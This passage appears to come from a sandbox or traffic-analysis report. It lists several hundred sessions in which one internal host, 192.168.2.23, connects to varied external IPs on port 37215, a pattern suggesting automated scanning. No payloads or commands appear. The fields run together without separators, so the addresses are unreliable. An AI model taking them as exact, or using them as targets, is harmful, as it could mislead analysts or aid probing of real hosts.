                                          5431192.168.2.235132441.191.210.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5432192.168.2.2353716157.44.37.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5433192.168.2.2345046144.111.144.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5434192.168.2.233984862.99.45.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5435192.168.2.2358628157.204.121.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5436192.168.2.2353994157.170.28.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5437192.168.2.234270641.128.186.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5438192.168.2.234504641.232.15.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5439192.168.2.2352518197.26.49.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5440192.168.2.2338268157.176.194.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5441192.168.2.234846641.217.53.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5442192.168.2.2357020197.164.20.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5443192.168.2.2333102197.161.87.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5444192.168.2.2336334157.234.170.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5445192.168.2.2335660197.44.224.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5446192.168.2.2341590157.179.17.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5447192.168.2.2335704157.88.224.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5448192.168.2.234766241.70.62.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5449192.168.2.233304441.163.117.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5450192.168.2.2341546197.239.185.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5451192.168.2.2348270157.74.36.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5452192.168.2.235446852.21.227.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5453192.168.2.235081041.134.43.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5454192.168.2.2351662157.200.206.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5455192.168.2.2339874197.72.217.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5456192.168.2.2341790197.67.185.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5457192.168.2.2342808197.8.78.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5458192.168.2.2348286157.112.206.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5459192.168.2.235146041.106.33.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5460192.168.2.236041066.139.138.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5461192.168.2.2356230158.10.181.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5462192.168.2.2345852197.15.197.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5463192.168.2.2346958157.247.131.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5464192.168.2.2350302197.148.155.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5465192.168.2.2334352157.69.246.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5466192.168.2.2338100157.16.135.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5467192.168.2.2348844197.52.55.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5468192.168.2.2346064157.58.142.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5469192.168.2.2337334157.200.199.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5470192.168.2.2360126197.160.186.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5471192.168.2.2358424157.75.117.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5472192.168.2.2347762109.122.187.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5473192.168.2.234768441.77.142.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5474192.168.2.234888641.127.109.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5475192.168.2.233873241.229.26.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5476192.168.2.2358644197.159.119.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5477192.168.2.233492041.203.208.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5478192.168.2.2354276157.201.78.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5479192.168.2.2355876124.244.74.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5480192.168.2.2340218197.191.152.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5481192.168.2.235275668.247.201.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5482192.168.2.2346576157.34.222.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5483192.168.2.233712641.123.178.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5484192.168.2.2351154217.145.49.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5485192.168.2.2349640132.134.30.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5486192.168.2.236070441.10.71.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5487192.168.2.2344654197.184.234.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5488192.168.2.2339328157.10.19.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5489192.168.2.2358498197.252.222.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5490192.168.2.2360178178.104.14.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5491192.168.2.2351074197.140.130.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5492192.168.2.233402295.102.24.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5493192.168.2.2354900157.26.222.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5494192.168.2.235299083.145.38.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5495192.168.2.2353692157.135.220.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5496192.168.2.2359654157.71.57.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5497192.168.2.2339616197.137.150.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5498192.168.2.2338260197.179.101.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5499192.168.2.234452441.53.216.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5500192.168.2.2342796157.210.113.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5501192.168.2.2337280197.246.172.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5502192.168.2.2335816203.230.38.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5503192.168.2.2358624108.129.97.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5504192.168.2.2341044157.88.224.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5505192.168.2.234568841.67.167.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5506192.168.2.233679841.81.191.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5507192.168.2.235196241.105.126.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5508192.168.2.235885241.184.205.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5509192.168.2.236072441.60.77.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5510192.168.2.234382441.222.70.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5511192.168.2.2354516157.138.220.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5512192.168.2.2337996197.121.105.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5513192.168.2.2341972157.157.101.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5514192.168.2.2335332197.5.147.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5515192.168.2.2349158106.14.5.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5516192.168.2.2338470197.178.114.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5517192.168.2.2341534197.218.22.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5518192.168.2.2360814197.117.73.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5519192.168.2.23604764.6.250.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5520192.168.2.2354600157.208.106.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5521192.168.2.2355706157.152.215.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5522192.168.2.2342562157.32.23.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5523192.168.2.2347952157.242.9.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5524192.168.2.2354566197.102.226.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5525192.168.2.233887262.211.42.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5526192.168.2.235699050.238.247.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5527192.168.2.2351804157.131.112.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5528192.168.2.235673225.20.79.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5529192.168.2.2355282147.138.23.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5530192.168.2.236092241.55.49.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5531192.168.2.2357116157.82.18.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5532192.168.2.2355874137.97.224.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5533192.168.2.2344798157.139.51.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5534192.168.2.2342512157.113.134.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5535192.168.2.2356030157.165.170.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5536192.168.2.2355484122.223.178.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5537192.168.2.2348116157.175.247.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5538192.168.2.233931841.132.52.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5539192.168.2.235258423.137.145.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5540192.168.2.2351368134.15.42.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5541192.168.2.2350474197.237.34.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5542192.168.2.2335994143.168.172.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5543192.168.2.2353862157.168.98.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5544192.168.2.2348042157.33.245.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5545192.168.2.233852441.235.223.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5546192.168.2.2348166157.195.136.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5547192.168.2.2355832197.102.14.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5548192.168.2.2343144197.91.106.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5549192.168.2.2358052145.57.98.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5550192.168.2.233761441.37.32.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5551192.168.2.2333420157.175.123.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5552192.168.2.234141041.188.4.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5553192.168.2.235193841.17.85.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5554192.168.2.2345232197.113.248.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5555192.168.2.234846012.46.144.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5556192.168.2.233979441.70.9.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5557192.168.2.233807841.216.135.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5558192.168.2.2352054197.156.4.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5559192.168.2.234833241.91.130.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5560192.168.2.2341686159.109.250.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5561192.168.2.2344000197.133.65.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5562192.168.2.233735841.53.66.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5563192.168.2.234209041.238.218.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5564192.168.2.2344262157.189.251.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5565192.168.2.2351368197.87.56.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5566192.168.2.2350918157.239.196.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5567192.168.2.2335228204.140.163.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5568192.168.2.2357278157.19.125.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5569192.168.2.234833041.6.13.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5570192.168.2.233910474.115.205.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5571192.168.2.2357214197.177.28.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5572192.168.2.2358530197.179.130.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5573192.168.2.2346624197.239.191.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5574192.168.2.234533441.148.103.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5575192.168.2.2348270157.125.18.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5576192.168.2.233970090.20.143.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5577192.168.2.235098497.69.175.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5578192.168.2.2355142131.123.16.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5579192.168.2.2342248207.186.53.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5580192.168.2.2347790197.136.255.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5581192.168.2.2354614157.154.164.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5582192.168.2.235008886.189.51.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5583192.168.2.2334524197.81.38.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5584192.168.2.2337376157.25.1.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5585192.168.2.2350766157.109.88.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5586192.168.2.235525241.7.47.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5587192.168.2.2352462157.82.46.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5588192.168.2.2338580173.54.50.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5589192.168.2.2335006157.78.205.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5590192.168.2.2339320121.67.135.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5591192.168.2.2342176197.153.118.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5592192.168.2.233781650.240.195.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5593192.168.2.234353041.189.205.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5594192.168.2.2353534197.200.153.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5595192.168.2.235902041.143.132.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5596192.168.2.2354150197.156.184.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5597192.168.2.2343080104.193.61.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5598192.168.2.234647641.108.66.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5599192.168.2.2333342205.226.95.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5600192.168.2.2356700197.166.195.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5601192.168.2.2338936197.51.243.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5602192.168.2.2357836161.42.194.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5603192.168.2.2335932157.118.198.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5604192.168.2.2336280157.202.148.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5605192.168.2.2339892197.30.169.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5606192.168.2.235328496.229.199.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5607192.168.2.235978241.244.173.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5608192.168.2.235024240.93.134.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5609192.168.2.2348502197.87.231.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5610192.168.2.234329641.188.30.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5611192.168.2.2341060157.115.247.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5612192.168.2.233323841.84.109.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5613192.168.2.234063642.207.157.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5614192.168.2.234258041.202.208.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5615192.168.2.2353572197.91.48.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5616192.168.2.2350880197.123.224.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5617192.168.2.2352928157.136.79.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5618192.168.2.233442041.106.170.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5619192.168.2.2356746197.164.65.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5620192.168.2.2354482157.163.77.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5621192.168.2.2347238157.6.199.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5622192.168.2.2345446157.62.69.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5623192.168.2.2341648163.96.10.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5624192.168.2.2341010197.16.116.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5625192.168.2.2336412132.128.33.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5626192.168.2.233493212.130.161.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5627192.168.2.234232241.10.201.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5628192.168.2.235312641.26.142.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5629192.168.2.2356862157.191.183.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5630192.168.2.2358244157.234.176.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5631192.168.2.2360306157.173.81.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5632192.168.2.2343290197.186.238.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5633192.168.2.2360552197.127.136.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5634192.168.2.2343048197.201.173.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5635192.168.2.2355920197.194.2.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5636192.168.2.234418841.171.127.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5637192.168.2.2351786197.223.246.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5638192.168.2.2347822197.170.200.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5639192.168.2.2344274157.89.42.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5640192.168.2.235897441.58.84.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5641192.168.2.233811299.108.133.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5642192.168.2.235113641.149.114.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5643192.168.2.2348100157.54.163.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5644192.168.2.2340378197.99.213.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5645192.168.2.2337184197.121.102.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5646192.168.2.235901827.167.8.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5647192.168.2.235000041.65.240.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5648192.168.2.234699614.163.199.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5649192.168.2.233473641.83.39.18937215
